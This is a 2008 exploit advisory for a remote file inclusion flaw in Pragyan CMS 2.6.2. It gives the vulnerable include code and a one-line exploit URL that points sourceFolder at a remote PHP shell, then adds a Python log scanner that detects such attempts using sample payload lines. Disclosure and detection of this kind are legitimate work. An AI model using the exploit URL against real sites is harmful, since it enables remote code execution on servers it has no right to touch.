Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

2008.07.20
Credit: N3TR00T3R
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<< In The Name Of GOD >>
-------------------------------------------------------------
- [ Persian Boys Hacking Team ] -:- 2008 -
- discovered by N3TR00T3R [at] Y! [dot] com
- pragyan 2.6.2 Remote File Inclusion
- download :http://sourceforge.net/project/showfiles.php?group_id=220286
- sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd
  r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser
  Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...
  [www.Persian-Boys.com] & [www.irchatan.com]
--------------------------------------------------------------
if register_globals = On;

Vul Code : [/cms/modules/form.lib.php]
##########################################################
#global $sourceFolder;
#global $moduleFolder;
#require_once("$sourceFolder/$moduleFolder/form/editform.php");
#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");
#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");
#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");
#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");
##########################################################

Exploit :
##########################################################
#
# www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php?
#
##########################################################

References:

http://xforce.iss.net/xforce/xfdb/43777
http://www.securityfocus.com/bid/30235
http://www.milw0rm.com/exploits/6078
http://secunia.com/advisories/31101
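
Added example (not part of the original advisory or of Pragyan CMS): a Python check that scans web-server access logs for requests that set the sourceFolder or moduleFolder globals to a URL or stream wrapper, including nested percent-encoding. The log lines are constructed samples in Apache combined format, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Globals that form.lib.php interpolates into its require_once paths (exact PHP case).
PATH_GLOBALS = {"sourceFolder", "moduleFolder"}
# URL/stream wrappers that PHP include/require can resolve instead of a local directory.
REMOTE_SCHEME = re.compile(r"^\s*(https?|ftps?|php|data|expect)\s*:", re.I)
# Apache common/combined format: host ident user [time] "METHOD target PROTO" status ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3})')

# Constructed sample log lines (documentation addresses, hypothetical remote host).
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Jul/2008:10:15:02 +0000] "GET /cms/modules/form.lib.php?sourceFolder=http://files.example.net/x.txt? HTTP/1.0" 200 512',
    '203.0.113.9 - - [20/Jul/2008:10:16:40 +0000] "GET /cms/modules/form.lib.php?sourceFolder=%2568ttp%253A%252F%252Ffiles.example.net%252Fx.txt HTTP/1.1" 404 209',
    '192.0.2.15 - - [20/Jul/2008:10:17:11 +0000] "GET /cms/index.php?page=home HTTP/1.1" 200 4096',
    '192.0.2.15 - - [20/Jul/2008:10:18:30 +0000] "GET /cms/modules/form.lib.php?sourceFolder=cms HTTP/1.1" 200 0',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %2568ttp) up to a fixed depth."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_rfi_attempts(lines):
    """Return (client, path, param, value, status) for each suspicious parameter."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the expected log format
        client, _method, target, status = m.groups()
        parts = urlsplit(target)
        for name, raw in parse_qsl(parts.query, keep_blank_values=True):
            value = fully_decode(raw)  # parse_qsl has already decoded one layer
            if name in PATH_GLOBALS and REMOTE_SCHEME.match(value):
                hits.append((client, parts.path, name, value, int(status)))
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

register_globals also imports POST and cookie variables, which a standard access log does not record, so an empty result here does not rule out attempts through those channels.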


Copyright 2024, cxsecurity.com

 
